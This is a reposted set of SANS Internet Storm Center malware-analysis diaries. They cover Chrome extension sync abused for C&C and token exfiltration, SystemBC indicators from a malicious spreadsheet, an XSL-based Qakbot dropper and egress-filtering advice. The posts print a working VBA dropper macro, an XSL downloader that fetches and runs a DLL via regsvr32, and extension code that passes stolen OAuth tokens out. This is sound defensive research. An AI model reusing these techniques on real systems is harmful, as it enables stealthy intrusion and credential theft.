Blog

Archive for February, 2021

Abusing Google Chrome extension syncing for data exfiltration and C&C, (Thu, Feb 4th)

I had the pleasure (or not) of working on another incident where, among other things, the attackers were using a pretty novel way of exfiltrating data and using that channel for C&C communication. Some of the methods observed in the analyzed code were pretty scary from a defender’s point of view, as you will see further below in this diary.

The acquired code was only partially recovered, but it was enough to indicate the powerful features the attackers were (ab)using in Google Chrome, so let us dive in.

Google Chrome extensions

The basis for this attack was a malicious extension that the attackers dropped on the compromised system. Now, malicious extensions are nothing new: there have been plenty of analyses of such extensions, and Google regularly removes dozens of them from the Chrome Web Store, the official place to download extensions from.

In this case, however, the attackers did not use the Chrome Web Store but instead dropped the extension into a local folder and loaded it directly in Chrome on a compromised workstation. This is actually a legitimate feature in Chrome: you can access it by going to More Tools -> Extensions and enabling Developer mode, after which you can load any extension directly from a folder by clicking on “Load unpacked”:

The attackers created a malicious add-on which pretended to be the Forcepoint Endpoint Chrome Extension for Windows, as shown in the figure below. Of course, the extension had nothing to do with Forcepoint; the attackers just used the logo and the name:

When creating a Chrome extension, its configuration is stored in a file named manifest.json, which defines what permissions the extension has and many other parameters. The manifest.json file used by this malicious extension is shown below, with some parts redacted:

There are many parameters that can be used here, but the most important ones for this case are the following (a minimal sketch follows after the list):

  • content_scripts defines JavaScript files which will be injected into web pages defined in the matches object (redacted from the screenshot). This can be used by an attacker to add arbitrary code to target web pages (think changing content and stealing data)
  • permissions defines the permissions that the extension requires; in this example it is set to storage, which allows the extension to use the storage API
  • background defines JavaScript files that will run when the extension is loaded. This is where the attacker had their exfiltration and C&C features embedded. Background scripts are extremely powerful and allow a script to send and receive messages in the background (as the name says)
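To tie these parameters together, here is a minimal sketch of what such a manifest might look like. This is not the attackers’ actual manifest (which was only shown redacted); the version, matched URL and script file names are placeholders:

{
  "name": "Forcepoint Endpoint Chrome Extension for Windows",
  "version": "1.0",
  "manifest_version": 2,
  "permissions": [ "storage" ],
  "content_scripts": [
    { "matches": [ "https://redacted.example/*" ], "js": [ "content.js" ] }
  ],
  "background": { "scripts": [ "background.js" ] }
}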

The majority of further analysis was based on the background scripts so I will skip details which are not interesting for this particular case.

The background script used the jQuery library, so the extension contained a legitimate version of jQuery (hey, everyone wants their life easy). But there were also some things that I saw for the first time, which is why I think this particular exploitation is novel.

Before showing the code, I must explain the goal of this particular attacker: they wanted to manipulate data in an internal web application that the victim had access to. While they also wanted to extend their access, they actually limited activities on this workstation to those related to web applications, which explains why they dropped only the malicious Chrome extension and not any other binaries. That being said, it also makes sense: almost everything is managed through a web application today, be it your internal CRM, document management system, access rights management system or something else (which is why I love teaching SEC542).

With that in mind, let’s take a look at a part of the background script that was dropped by the malicious Chrome extension. Even if you are not a JavaScript developer, the code should be relatively easy to understand (once we explain what the specific methods are used for):

This is what the code does:

  • First, the attacker used the chrome.runtime.onConnectExternal.addListener method. This method is part of the chrome.runtime API that the Chrome browser provides to extensions.
    The onConnectExternal.addListener method allows a developer to set up a listener which will be fired when a connection is made from another extension. Interesting, so this allows for communication between extensions.
  • Then the attacker calls the port.onMessage.addListener method. The Port object allows for two-way communication, so our extensions can have a nice conversation. The rest sets up a listener which will be called when the other extension calls postMessage(); that’s how messages are sent between extensions.
  • After some debugging output that the attacker left in (the console.log call), there is a switch statement that checks the value of the type parameter in the received message (this is just an excerpt from a bigger switch case).
  • Now an interesting thing happens: if the value of the type parameter is “check_oauth_token_status”, the extension will check whether there is a key called “oauth_token” in Chrome’s storage. If there is, it will send a message back (to the other extension) containing the value of the token with the status set to true, after which the key will be deleted from Chrome’s storage.
  • If the value of the type parameter is “save_mailhighlight_token”, the extension will create a new key called email in Chrome’s storage, with the value of “highlight_token” assigned to it.

This is hopefully readable in the code, but wait, the best is yet to come: since the extension uses the chrome.storage.sync.get and chrome.storage.sync.set methods (instead of chrome.storage.local), all these values will be automatically synced to Google’s cloud by Chrome, under the context of the user logged into Chrome. In order to set, read or delete these keys, all the attacker has to do is log into Google with the same account (and this can be a throwaway account) in another Chrome browser, and they can communicate with the Chrome browser in the victim’s network by abusing Google’s infrastructure!
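Here is a minimal sketch reconstructing the behaviour described above. The message field names (type, highlight_token) and storage keys (oauth_token, email) come from the analysis; everything else is an assumption:

chrome.runtime.onConnectExternal.addListener(function (port) {
  port.onMessage.addListener(function (msg) {
    console.log(msg); // debugging left in by the attacker
    switch (msg.type) {
      case "check_oauth_token_status":
        // read the token from synced storage, send it back, then delete it
        chrome.storage.sync.get("oauth_token", function (items) {
          if (items.oauth_token) {
            port.postMessage({ status: true, oauth_token: items.oauth_token });
            chrome.storage.sync.remove("oauth_token");
          } else {
            port.postMessage({ status: false });
          }
        });
        break;
      case "save_mailhighlight_token":
        // store the received value under the key "email"; Chrome syncs it to Google's cloud
        chrome.storage.sync.set({ email: msg.highlight_token });
        break;
    }
  });
});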

While there are some limitations on the size of data and the number of requests, this is actually perfect for C&C commands (which are generally small) or for stealing small but sensitive data, such as authentication tokens!

For me, this was the first time I had seen something like this, so I naturally wanted to test it to see how it works, and you can do the same.

For testing you can use any extension you have, as long as it requests the storage permission. For this demo I will be using the Google Docs Offline extension, something a lot of users might have installed in their browser (I do as well). Enable Developer mode and, on the extension, click on the background page link:

The DevTools console will now open, allowing you to issue commands directly as this extension. Normally an attacker would put the code into files as described above, but for the test we will execute commands directly. Go to the Console tab, where you can use the APIs directly. Let’s store and sync a test message over Google’s infrastructure:
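The command looks something like the following sketch (the key name and value are the ones described just below):

chrome.storage.sync.set({ 'SANS': 'Hello from Internet Storm Center' }, function () {
  console.log('Key stored and queued for syncing');
});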

This will create a key called “SANS” with the value “Hello from Internet Storm Center” and sync it to the account. The sync does not happen instantly, but in my tests it usually completed within 10-15 seconds at most. Now let me log in on my other machine, open the DevTools console the same way as above and read this key (notice this is done on a Mac):
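Reading the key back boils down to something like this (again a sketch, using the callback form of chrome.storage.sync.get):

chrome.storage.sync.get('SANS', function (items) {
  console.log(items.SANS); // prints "Hello from Internet Storm Center" once the key has synced
});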

Woot! It worked! So we can use this to “have a chat” between these two machines, over Google’s infrastructure. As you can imagine, this can be used both as a C&C communication channel and for slow exfiltration of data. It will be slow because Chrome and Google throttle requests. Specifically, a key can be up to 8 KB (8,192 bytes) in size, with a maximum of 512 keys, allowing us to transfer 4 MB at a time. Besides this, Chrome will allow 2 set, remove or clear operations per second, or 1,800 operations per hour. Hmm, when I think about it, it’s not that slow really.

I was, of course, also interested in what this looks like on the wire and whether it is possible to detect such abuse of Chrome’s extensions.
All the requests Chrome makes are directed to clients4.google.com, over HTTPS. The request syncing the key I set previously is shown below:

Now, if you are thinking of blocking access to clients4.google.com, be careful: this is a very important host for Chrome, which is also used to check whether Chrome is connected to the Internet (among other things).

In the request shown in the figure above, the body is GZIP compressed. It contains a serialized object which also includes the key that was set. If you are intercepting your browser traffic at the edge (for example, with an interception proxy), this will make analysis (much) more difficult, but luckily the requests always appear to go to the /chrome-sync/ endpoint, so this is something you can block or alert on.

Besides this, I would recommend that (depending on your environment) Chrome extensions be controlled; Google allows you to do that through group policies, so you can define exactly which extensions are allowed/approved and block everything else.
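As a hedged sketch of that approach, the ExtensionInstallBlocklist/ExtensionInstallAllowlist policy pair can block everything except approved extensions. Shown below in the JSON form Chrome reads on Linux (for example from /etc/opt/chrome/policies/managed/); on Windows the same settings are deployed through the Chrome ADMX templates/GPO, and the allow-listed extension ID is a placeholder:

{
  "ExtensionInstallBlocklist": [ "*" ],
  "ExtensionInstallAllowlist": [ "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" ]
}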

Hope you enjoyed this little analysis of how scary web browser extensions can be!
 


Bojan
@bojanz
INFIGO IS

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.


Excel spreadsheets push SystemBC malware, (Wed, Feb 3rd)

Introduction

On Monday 2021-02-01, a fellow researcher posted an Excel spreadsheet to the Hatching Triage sandbox.  This Excel spreadsheet has a malicious macro, and it uses an updated GlobalSign template that I hadn’t noticed before (link for the sample).

This Excel spreadsheet pushed what might be SystemBC malware when I tested it in my lab environment on Monday 2021-02-01.  My lab host was part of an Active Directory (AD) environment, and I also saw Cobalt Strike as follow-up activity from this infection.

Today’s diary reviews this specific instance of (what I think is) SystemBC and Cobalt Strike activity from Monday 2021-02-01.


Shown above:  Flow chart from the SystemBC infection on Monday 2021-02-01.

Infection Path

I didn’t know where these spreadsheets were coming from when I investigated this activity on Monday 2021-02-01.  By Tuesday 2021-02-02, several samples had come into VirusTotal, showing at least 20 spreadsheets contained in zip archives.  These zip archives appear to have been distributed as email attachments.  Unfortunately, I couldn’t yet find any emails submitted to VirusTotal that contained one of the zip archives.


Shown above:  Screenshot from one of the spreadsheets.

Spreadsheet macro grabs SystemBC malware

Enabling macros on a vulnerable Windows host caused HTTPS traffic to grab a Windows executable (EXE) file for SystemBC malware.  This EXE was stored and run from a new directory path created under the C: drive, as shown below.


Shown above: SystemBC malware saved to the infected Windows host.

This EXE file was made persistent on the infected host through a scheduled task.


Shown above:  Scheduled task to keep the malware persistent.

SystemBC post-infection traffic

The first post-infection traffic caused by SystemBC was TCP traffic to 109.234.39[.]169 over port 4001 as shown below.


Shown above:  SystemBC traffic over TCP port 4001.

Next was HTTP traffic to the same IP address over TCP port 80 that returned obfuscated text containing code to start the Cobalt Strike activity.


Shown above:  HTTP traffic caused by SystemBC that returned code for Cobalt Strike.

Cobalt Strike traffic

Cobalt Strike activity consisted of HTTPS traffic and DNS activity focused on the domain fastonent[.]com.


Shown above:  Cobalt Strike activity from the infection.


Shown above:  Alerts from the traffic using Sguil in Security Onion with Suricata and the ETPRO ruleset.

Indicators of Compromise (IOCs)

SHA256 HASHES OF 20 ZIP ARCHIVES WITH THE 20 EXCEL FILES THEY CONTAIN:

– 31a04fe64502bfe6f73971f9de9736402dd9a21a66d41d3a4ecea5ee18852f1c  documentation-82.zip
– a54b331832d61ae4e5a2ec32c46830df4aac4b26fe877956d2715bfb46b6cb97  Document21467.xls

– ce02ed48d9ab12dfe2202c16f1f272f75e5b1c0b64e48e385ca71608cb686fc8  documentation-17.zip
– 62f1ef07f7bab2ad9abf7aeb53e3a5632527a1839c3364fbaebadd78d6c18f4e  Document13160.xls

– 4dfb0bb69a07f1cd7b46198b5edf8afebd0cdd02f27eb2c687447f692625fb9f  contract-86.zip
– 59bbcecd3b1670afc5430e3b31377f24da24f4e755b7c563a842ce4e325aa61a  Document24071.xls

– c3a38df6f4864d32c10e8ecf063e18cba56c3b1add3404634ea20ea109198620  agreement-92.zip
– 8ef917da85afcc5f7bfe9cc2afd29f44a7f0cda5ba0249b50ef448d547007461  Document1525.xls

– 3a181036cdc46e088f1cb98acd06062d32a8a11a8ef65fe7544bb22a2fd5c56e  information-94.zip
– 387bdfedc306e087d8ceceb1f1f8f7a6b3c32110ca3d7273eb01e474349d1974  Document10668.xls

– 244625f6627cadadb7faf8a6b526e91aee4f5c1cadfa1c0d4fb996f4cc60a5ae  documentation-18.zip
– 17ed4dc4369a90d2e24f1ab0fa1eeb6fca61f77b183499c47e5cfb9ce12130fb  Document7833.xls

– cca4a3c8af9b549b445b7e2bcb2d45b95982890b6ed3b62fc882f0478f512b2f  agreement-44.zip
– f682f0756ec96d262ae4c48083d720657685d9b56278bd07b2656f3b33be985e  Document1047.xls

– dcff925d51e90586eb624f249e56b6abb7026b364fab84dcfcf44025e84ff7d9  DOCUMENT-30.zip
– 2e726c5a27e04633d407e13bd242ae71865eef13ac78bf9068e1200823e5ea81  Document15758.xls

– dc5a3675455d9486e7aa8aaf2463b69ad03c508375eb99b6fb3039d914677a9f  information-94.zip
– 6c0ef43c1f8b4425d034a46812903b8a6345ae24e556e61e37c0f14eba8c8d2e  Document15979.xls

– 7d1602138a26c0524b32570f3fb292fd5a7efbc5ed53ae260d7b7f3652a78969  documentation-83.zip
– b4107daacbbfac1b9bc9b3fa4e34a8d87037fa2c958db9d6d7df52380f15a1d1  Document16000.xls

– 0fb4d8ac3cdef038bf53c8f4269eef5845704a9e962b7609fd93a9f08cc2fab1  documentation-48.zip
– ff483bbb98d02d1e071d6f0e8f3a3c1706c246db71221455b29f4e54b0c4ef2f  Document29060.xls

– 0cf4fff7f96cf695d3476e7dc66794d067acafbd2980f69526b874fc5b4c08be  docs-62.zip
– 441f076519f0bdc04d110b4fa73dbafa3b667825ceab6d4099e36714bd1d7213  Document5804.xls

– 056911f208c9b475020627b83c8bf3a0151e30ec7f71113cf75abb950a431efc  answer-46.zip
– 795a5d5c57dac1703c6b4bab9507d1c662180716b4afa89c261aa3bb6d164e2f  Document10660.xls

– 31901336fdfae4fdeac46b937a059c618d5ba3e04d06bb8e95108a307e2c6d94  DOCUMENT-74.zip
– b2aa3ee1cc617f90e92664969a0856d98a97c727edd7c81ef83c038a34a432d5  Document4083.xls

– e06ee4e0bbe581edc39aecaab76e3fa12a53cb971ec0c106644703b376f5ed24  reaction-32.zip
– a3ce1043a7791b73fe14d7c29377467fd64df3b3b464c48a22a6d3bd2f7786aa  Document18681.xls

41 OTHER EXCEL FILES WITH THE SAME DOCUMENT TEMPLATE:

– 044494acb6d781e6cc3b9a837b7ebca1e933080fe384a874f5eb9cca1ea76a55  DOCUMENT-99.xls
– 071809d68b777cae171284c2cc289b455a778b1f054cd0f244cf0fb6053dae2d  documentation-47.xls
– 0e094197fca1947eb189006ddeb7d6ad9e5d1f58229e929bc0359887ed8a667d  agreement-84.xls
– 134a5bfe06f87ace41e0e2fb6f503dca0d521cb188a0c06c1c4bc734ad01e894  Document5201.xls
– 13ef189260cd344e61a0ad5907c5e695372b00fe1f5d5b2b3e389ad2b99b85e4  documentation-32.xls
– 17fb4271ab9113a155c091c7d7bd590610da87e986ccf5962aa7fc4b82060574  SG_information-24.xls
– 19065d8aa76ba67d100d5cb429a8b147c61060cc49905529d982042a55caceef  agreement-26.xls
– 1b63ff13d507f9d88d03e96c3ef86c7531da58348f336bc00bf2d2a2e378fd90  documentation-63.xls
– 1d8fd79934dc9e71562e50c042f9fa78a93fa2991d98c33e0b6ab20c0b522d5a  required-47.xls
– 1e295b33d36dee63930728349be8d4c7b8e5b52f98e6a8d9ca50929c8a3c9fb1  contract-52.xls
– 2156a9f3d87d3df1cee3f815f609c2a3dc2757717ff60954683c34794e52b104  document-85.xls
– 21db2f562b9182a3fcdb0fce8c745b477be02b4a423a627cddf6a1c244b6c415  DOCUMENT-64.xls
– 2f66e8d84e87811feaf73e30b08be0ad6381271ddfb5071556bd26cd3db2c3f4  documents-74.xls
– 32452e930a813f41a24dc579a08e8dde1801603797d527ce1385ad414b00e676  Document9330.xls
– 32a904d301e8a30b7bd70804b905dd7b858b761979f3344bc2ec3bff0cb6d703  DOCUMENT-64.xls
– 3dcd7897ad927f4b2b860010963e02903bc68a2c0c86abb1a27b8cbaab2fa9b6  document-91.xls
– 418460bf69c01e47cbe261d7f7312475cda4305860fbbe3d3e6639b9adb78de5  Document8107.xls
– 49cb79f8547c9c94a7ab6642ba1c40fcd036625f71845f2c6203d76c5f7f46fb  documents-44.xls
– 4af6e8805273ca9b3dea793bd712ed785ea5c5ed9e387cb8ab5059a4f364a303  docs-49.xls
– 584c2aab3fe9e1ec9f9dffecbd32e6af8b6b3fa3141c7ddf845763cbf14a82eb  DOCUMENT-30.xls
– 5cecb7e104e73aa9916a7154a3004d1a71c59c8f473d693f3b285b2fd473e454  documentation-66.xls
– 669de92b909247d676daa6bab3b3ae5be4fbec2e77f66915267f032c1d7eb71a  agreement-50.xls
– 6bf9612a2b8288d55b47648f9ad9ee80cca5058ced5fb77254e57f9ff2d701d3  contract-38.xls
– 6df34ffeffb9cc5def3c424cd8bb0f90ab921be24efd1f8fe52ea6c13e700334  data-65.xls
– 8072f20dd769519a621255307b03e85dca2fe227f48486b0aacc41903ab3bfdf  Document12611.xls
– 8eb429c24872a501fafc783e8a0fcc53e0ebb5cc8ec4f2310fc10102b1d23a27  contract-90.xls
– 908cb8f6f39b9c310d8df54bddf667d23b0851bbf90b21ca89ea69d211f2c402  Document21461.xls
– 9519a0631804d18f95d4c3239df5e5ea56b8e5a890b73c889a58d6469958eb71  Document11622.xls
– 952ec18a6dc949ebd335f5eabed756d0f562aa3853fe9384dc0eded0de5f843b  required-36.xls
– a274a08d84958666b6c94e1a6fc3b676aca387544a4218c8473e1a9a72124532  documentation-45.xls
– a7b362864724ccb5cba416ff45b4e137f22f8fed4492b5521e369026107031b2  Document9470.xls
– ab9b97d0d17b2434d2cfc66106ae07b903271ba603be1314b742338c23cce20c  docs-72.xls
– c4d745576b47b6dd79a9d92cda7dbe60c2cda7d8960a07e33692e6e71f8e5eb3  document-78.xls
– c8fd542a9b500ada7afbff26b6c11dd2ab22aaefd30ef7a999410ee20d2fb043  answer-69.xls
– d0c96aacb07629b9d97641a0022b50827f73d86a34fa4929b126f398cf4cf486  Document21265.xls
– d3145f4f7b1c62f9a1937aa9e968da8b52ff4fde83c0dba3152567b2b65d809a  documentation-49.xls
– d4e372014a40821f10780fcc12c6b5a1cdf4740738a0769e78f06dd10b6ec53f  daret.xls
– d85eb8e5c39d7681155e39602ce30e0c3793b4513f1038e48334296db945e02d  documentation-29.xls
– e26ab2d6cff95ba776ec6e7beb8c70f2e4d79467b71153ddb36177cb2b2a1273  Document4677.xls
– e64d605e857900a07c16e22e288c37355e4ebd6021898268ab5dded5c8c4efca  documentation-99.xls
– f5e2351ff528c574dc23c7ef48ddac42546c86d77c28333b25112a9efbfb9d93  Document18108.xls

AT LEAST 7 URLS GENERATED BY EXCEL MACROS FOR A MALWARE PAYLOAD:

– hxxps://alnujaifi-portal[.]com/ds/3101.gif
– hxxps://clinica-cristal[.]com/ds/3101.gif
– hxxps://eyeqoptical[.]ca/ds/3101.gif
– hxxps://gbhtrade.com[.]br/ds/3101.gif
– hxxps://newstimeurdu[.]com/ds/3101.gif
– hxxps://remacon[.]net/ds/3101.gif
– hxxps://skconstruction[.]info/ds/3101.gif

MALWARE PAYLOAD EXAMPLE (SYSTEMBC EXE):

– SHA256 hash: 61499704920ee633ffb2baab36eb8eb70d5e0426bca584f9a4a872e4b930c417
– File size: 243,200 bytes
– File location: C:BlockStUptqeodkwineditor.exe

SYSTEMBC TRAFFIC:

– 109.234.39.169 over TCP port 4001 – encoded/encrypted data
– 109.234.39.159 over TCP port 80 – GET /systembc/[24 ASCII characters representing hex string].txt

COBALT STRIKE ACTIVITY:

– 192.169.6.8 over TCP port 443 – no domain – HTTPS traffic
– 192.169.6.8 over TCP port 443 – fastonent[.]com – HTTPS traffic
– 192.169.6.8 over TCP port 8080 – fastonent[.]com – HTTPS traffic
– DNS queries/responses for various domains ending with .dns.fastonent[.]com

Final words

I’m not 100 percent sure this malware is SystemBC, but HTTP traffic caused by the EXE has /systembc/ in the URL, so I’m calling it SystemBC until someone identifies it as another malware family.

When I ran the spreadsheet on a stand-alone host, I only saw SystemBC traffic over TCP port 4001.  I didn’t see the Cobalt Strike traffic until I infected one of my lab hosts within an AD environment.  This reflects a trend I’ve noticed with at least one other malware family (Hancitor), where Cobalt Strike doesn’t appear unless the infected host is running in an AD environment.

A pcap of the infection traffic and the malware from the infected Windows host can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.


New Example of XSL Script Processing aka "Mitre T1220", (Tue, Feb 2nd)

Last week, Brad posted a diary about TA551[1]. A few days later, one of our readers submitted another sample belonging to the same campaign. Brad had a look at the traffic, so I decided to have a look at the macro, not because the code is heavily obfuscated, but because the data is spread across different locations in the Word document.

The sample was delivered through a classic phishing email with a password-protected archive. It’s a file called ‘facts_01.28.2021.doc’ (SHA256: dcc5eb5dac75a421724fd8b3fa397319b21d09e22bc97cee1f851ef73c9e3354) and it was unknown on VT at the time.

It does indeed contain a macro:

[email protected]:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc
A: word/vbaProject.bin
 A1:       539 'PROJECT'
 A2:        89 'PROJECTwm'
 A3: m    1127 'VBA/ThisDocument'
 A4:      3687 'VBA/_VBA_PROJECT'
 A5:      2146 'VBA/__SRP_0'
 A6:       198 'VBA/__SRP_1'
 A7:       348 'VBA/__SRP_2'
 A8:       106 'VBA/__SRP_3'
 A9: M    1165 'VBA/a7JUT'
A10: M   10838 'VBA/aBJwC'
A11:       884 'VBA/dir'
A12: m    1174 'VBA/frm'
A13:        97 'frm/\x01CompObj'
A14:       286 'frm/\x03VBFrame'
A15:       170 'frm/f'
A16:      1580 'frm/o'

While looking at the “M” flags in the oledump output is a key step, it’s always good to have a look at all the streams. A first interesting observation is the presence of a user form in the document (see the ‘frm’ in streams 13 to 16, combined with the ‘m’ in stream 12). ‘frm’ is the name given by the author. This can be verified by checking the document in a sandbox:

WARNING: Don’t do this on a regular host!

The user form contains three elements (text boxes). Now let’s have a look at the document. The macros are polluted with comments, which can be cleaned up by filtering them out (that’s what the grep -v "' " in the commands below does).

Stream 9 is not that interesting; it just contains the AutoOpen() function, which calls the real entry point:

[email protected]:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc -s 9 -v | grep -v "' "
Attribute VB_Name = "a7JUT"
Sub AutoOpen()
Call ahjAvX
End Sub

The really interesting one is located in stream 10:

[email protected]:/MalwareZoo/20210129$ oledump.py facts_01.28.2021.doc -s 10 -v | grep -v "' "
Attribute VB_Name = "aBJwC"
Function ajC1ui(auTqHQ)
End Function
Function atZhQ(aF1TxD)
atZhQ = ActiveDocument.BuiltInDocumentProperties(aF1TxD)
End Function
Function ayaXI(aa5xD, aqk4PA)
Dim aoTA6S As String
aoTA6S = Chr(33 + 1)
ayaXI = aa5xD & atZhQ("comments") & aoTA6S & aqk4PA & aoTA6S
End Function
Function acf8Y()
acf8Y = "L"
End Function
Sub ahjAvX()
axfO6 = Trim(frm.textbox1.text)
aa6tSY = Trim(frm.textbox2.text)
aqk4PA = aa6tSY & "xs" & acf8Y
aa5xD = aa6tSY & "com"
a6AyZu = Trim(frm.textbox3.text)
aYlC14 aqk4PA, axfO6
FileCopy a6AyZu, aa5xD
CreateObject("wscript.shell").exec ayaXI(aa5xD, aqk4PA)
End Sub
Sub aYlC14(aFp297, axfO6)
Open aFp297 For Output As #1
Print #1, axfO6
Close #1
End Sub

ahjAvX() is called from AutoOpen() and starts by extracting the values of the user form elements: frm.textbox[1-3].text

Element #3 contains “c:\windows\system32\wbem\wmic.exe”
Element #2 contains “c:\programdata\hello.” (note the dot at the end)
And element #1 contains what looks to be some XML code.

Before checking the XML code, let’s deobfuscate the macro:

ahjAvX() reconstructs some strings and dumps the XML payload into an XSL file by calling aYlC14(). Then wmic.exe (the WMI command-line client) is copied to “c:\programdata\hello.com”. Before spawning a shell, more data is extracted from the document via atZhQ():

Function atZhQ(aF1TxD)
atZhQ = ActiveDocument.BuiltInDocumentProperties(aF1TxD)
End Function

The document comments field contains the string “pagefile get /format:”

By the way, did you see the author’s name?

With the extracted comments field, here is the function that executes the XSL file:

Function ayaXI(aa5xD, aqk4PA)
  Dim aoTA6S As String
  aoTA6S = Chr(33 + 1)
  ayaXI = aa5xD & atZhQ("comments") & aoTA6S & aqk4PA & aoTA6S
End Function

The reconstructed command line is:

c:\programdata\hello.com pagefile get /format: "c:\programdata\hello.xsl"

We have here a perfect example of a dropper that dumps an XSL file to disk and executes it. This technique is referred to as T1220 by Mitre[2]. Let’s now have a look at the XSL file:
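The actual XSL content is not reproduced here, so below is a generic, hedged sketch of what a T1220-style XSL file looks like when executed through wmic.exe with /format:. The function names awyXdU() and aOLsw() are the ones described below; the download URL, payload path and file names are placeholders:

<?xml version="1.0"?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
            xmlns:ms="urn:schemas-microsoft-com:xslt"
            xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
function aOLsw() {
    // download the DLL (placeholder, defanged URL)
    var req = new ActiveXObject("MSXML2.XMLHTTP");
    req.open("GET", "hxxps://example[.]invalid/payload.bin", false);
    req.send();
    var stream = new ActiveXObject("ADODB.Stream");
    stream.Type = 1;    // binary
    stream.Open();
    stream.Write(req.responseBody);
    stream.SaveToFile("C:\\ProgramData\\payload.dll", 2);   // 2 = overwrite
    stream.Close();
}
function awyXdU() {
    // entry point: fetch the DLL and execute it with regsvr32
    aOLsw();
    new ActiveXObject("WScript.Shell").Run("regsvr32.exe /s C:\\ProgramData\\payload.dll");
}
awyXdU();
]]>
</ms:script>
</stylesheet>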

The function awyXdU() is the entry point of this XSL file. It calls aOLsw() to download the malicious Qakbot DLL, dumps it on disk, and executes it with regsvr32. XSL files are not new, but it has been a while since I last spotted one. Didier already mentioned them in a previous diary back in 2019[3].

[1] https://isc.sans.edu/forums/diary/TA551+Shathak+Word+docs+push+Qakbot+Qbot/27030/
[2] https://attack.mitre.org/techniques/T1220/
[3] https://isc.sans.edu/forums/diary/Malicious+XSL+Files/25098

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.


Taking a Shot at Reverse Shell Attacks, CNC Phone Home and Data Exfil from Servers, (Mon, Feb 1st)

Over the last several weeks (after the Solarwinds Orion news) there’s been a lot of discussion on how to detect if a server-based application is compromised.  The discussions have ranged from buying new sophisticated tools, to auditing the development pipeline, to diffing patches.  But really, for me it’s as simple as asking “should my application server really be able to connect to any internet host on any protocol?”  Let’s take it one step further and ask “should my application server really be able to connect to arbitrary hosts on tcp/443 or udp/53 (or any other protocol)?”  And when you phrase it that way, the answer really should be a simple “no”.

For me, fixing this should have been a simple thing.  Let’s phrase this in the context of the CIS Critical Controls (https://www.cisecurity.org/controls/)
CC1: server and workstation inventory
CC2: software inventory 
(we’ll add more later)

I know these first two are simple, but in your organization, do you have a list of the software that’s running on each of your servers?  With the inbound listening ports?  How about the outbound ports that connect to known internet hosts?
This list should be fairly simple to create; figure a few minutes to an hour or so per application to phrase it all in terms that you can make firewall rules from.

CC12:
Now, for each server, make an egress filter “paragraph” for your internet-facing firewalls.  Give it permission to reach out to its list of known hosts and protocols.  It’s rare that you will have hosts that need to reach out to the entire internet; email servers on the SMTP ports are the only ones that immediately come to mind, and we’re seeing fewer and fewer of those on premises these days.
Also CC12:
So now you have the list of what’s allowed for that server.  Add the line “permit any ip log”; in other words, permit everything else, but log it to syslog.  Monitor that server’s triggered logs for a defined period of time (a day or so is usually plenty).  Be sure to trigger any “update from the vendor” events that might be part of any installed products.  After that period of time, change that line to “deny any ip log”, so now we’re denying outbound packets from that server, but still logging them.
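As a hedged sketch, using Cisco-style named ACL syntax (an assumption; adapt this to your own firewall), one server’s egress stanza during the monitoring phase might look like this, with all addresses and ports as placeholders for your own inventory:

ip access-list extended APPSERVER01-EGRESS
 remark vendor update service over HTTPS (placeholder destination)
 permit tcp host 10.0.10.25 host 203.0.113.10 eq 443
 remark internal DNS only (placeholder destination)
 permit udp host 10.0.10.25 host 10.0.0.53 eq 53
 remark monitoring phase: log everything else, review, then flip to deny
 permit ip host 10.0.10.25 any log

Once the monitoring window is over, that last line becomes “deny ip host 10.0.10.25 any log”, matching the deny-and-log approach described above.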

What about my Linux servers, you ask?  Don’t they need all of GitHub and everything else in order to update?  No, no they do not.  To get the list of repos that your server reaches out to for updates:

sudo apt-get update
Hit:1 http://us.archive.ubuntu.com/ubuntu focal InRelease
Hit:2 http://security.ubuntu.com/ubuntu focal-security InRelease
Hit:3 http://us.archive.ubuntu.com/ubuntu focal-updates InRelease
Hit:4 http://us.archive.ubuntu.com/ubuntu focal-backports InRelease
Reading package lists… Done

[email protected]:~$ cat /etc/apt/sources.list | grep -v "#" | grep deb
deb http://us.archive.ubuntu.com/ubuntu/ focal main restricted
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates main restricted
deb http://us.archive.ubuntu.com/ubuntu/ focal universe
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates universe
deb http://us.archive.ubuntu.com/ubuntu/ focal multiverse
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates multiverse
deb http://us.archive.ubuntu.com/ubuntu/ focal-backports main restricted universe multiverse
deb http://security.ubuntu.com/ubuntu focal-security main restricted
deb http://security.ubuntu.com/ubuntu focal-security universe
deb http://security.ubuntu.com/ubuntu focal-security multiverse

(this lists all sources, filters out the comment lines, and grepping for “deb” nicely filters out the blank lines)

Refine this list further to just get the unique destinations:

[email protected]:~$ cat /etc/apt/sources.list | grep -v "#" | grep deb | cut -d " " -f 2 | sort | uniq
http://security.ubuntu.com/ubuntu
http://us.archive.ubuntu.com/ubuntu/

So for a stock Ubuntu server, the answer is two: you need access to just two hosts to do a “direct from the internet” update.  Your mileage may vary depending on your configuration, though.

How about Windows?  For a standard application server, the answer is usually NONE.  You likely have an internal WSUS, SCCM or SCOM server, right?  That takes care of updates.  Unless you are sending mail with that server (which can be limited to just tcp/25, and most firewalls will restrict that to valid SMTP), your server is likely providing a service, not reaching out to anything.  Even if the server does reach out to arbitrary servers, you can likely restrict it to specific destination hosts, subnets, protocols or countries.

With a quick inventory in hand, creating a quick “stanza” for each server’s outbound permissions goes pretty quickly.  For each line, you’ll be able to choose a logging action of “log”, “alert” or “don’t log”.  Think about these choices carefully, and select the “don’t log” option at your peril.  Your last line for each server’s outbound stanza should almost without fail be your firewall’s equivalent of “deny ip any log”.

Be sure that your server change control procedures include an “after this change, does the application or server need any additional (or fewer) internet accesses?” step.

The fallout from this?  Surprisingly little.  

